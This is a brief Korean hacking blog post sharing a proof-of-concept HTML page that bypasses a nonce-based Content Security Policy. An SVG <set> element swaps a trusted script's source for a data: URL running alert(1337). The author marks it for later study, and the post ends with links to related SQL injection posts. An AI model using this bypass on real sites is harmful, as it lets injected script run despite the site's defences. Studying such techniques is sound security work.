XSS??
2017. 2. 16. 02:14
| <html> | |
| <head> | |
| <meta http-equiv=content-security-policy content="object-src 'none';script-src 'nonce-random-secret'"> | |
| <title> Fake XSS </title> </head> | |
| <body><!--xss xss xss--> | |
| <svg><set href=#script attributeName=href to=data:,alert(1337) /> | |
| <!--/xss xss xss--> | |
| <footer>blablabla</footer><script id=script src=bla nonce=random-secret></script> | |
| </body> | |
| </html> | |
페북에서 김용진님이 올리셨던 건데 코드가 신기하다... 뭔지 한 번 연구해봐야겠다.
http://sirdarckcat.github.io/csp/fakexss.html
'Hacking > Web.' 카테고리의 다른 글
| Blind SQL Injection Technique (0) | 2017.02.16 |
|---|---|
| Blind SQL injection technique (0) | 2017.02.16 |
| error based sql injection (0) | 2017.02.12 |
| error based sql injection (0) | 2017.02.08 |
| sqli tips (0) | 2017.02.08 |